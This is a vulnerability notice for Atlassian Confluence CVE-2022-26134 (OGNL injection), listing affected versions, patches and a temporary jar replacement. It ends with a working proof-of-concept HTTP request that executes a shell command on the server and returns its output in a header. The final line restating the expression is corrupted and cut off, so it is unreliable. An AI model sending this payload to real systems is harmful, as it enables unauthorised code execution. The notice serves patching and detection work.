Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) Risk Notice and POC Reappearance

1. Background introduction

Recently, the Department of Information Security detected a remote code execution vulnerability in Atlassian Confluence Server and Data Center (CVE-2022-26134).

Confluence is a professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. It is easy to use and can be used for enterprise teams to share information, document collaboration, brainstorming, and information push.

1.1 Vulnerability description

There is an OGNL injection vulnerability in Atlassian Confluence Server and Data Center. Malicious attackers can use this vulnerability to inject malicious ONGL expressions on the target Atlassian Confluence Server and Data Center server, resulting in remote code execution and deployment of WebShell.
At present, it has been found to be exploited in the wild, and the exploit script has been released, and the affected units should be upgraded as soon as possible.

1.2 Vulnerability number

CVE-2022-26134

1.3 Vulnerability Level

Vulnerability Threat Level: Critical

2. Repair suggestions

2.1 Affected versions

版本范围：

Confluence Server&Data Center ≥ 1.3.0

Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1

2.2 Repair suggestions

1. Official fixes:
The official versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 have been released, which contain fixes for this vulnerability. Please upgrade to the new version as soon as possible
Download link:
Confluence Server Download Archives | Atlassian
Confluence Security Advisory 2022-06-02 | Confluence Data Center and Server 7.18 | Atlassian Documentation

2. Temporary slow-release solution:
Download the official xwork-.0.3-atlassian-10.jar to replace the original xwork jar file in the confluence/WEB-INF/lib/ directory, and restart Confluence Download
address:
https://packages. atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

2.3 Reference link:

Confluence Security Advisory 2022-06-02 | Confluence Data Center and Server 7.18 | Atlassian Documentation

3. Vulnerability detection POC

Vulnerability recurrence

The method of exploiting this vulnerability is very simple. You can execute any command by directly sending the following request, and get the execution result in the HTTP return header:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

其中使用到的OGNL表达式为
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id")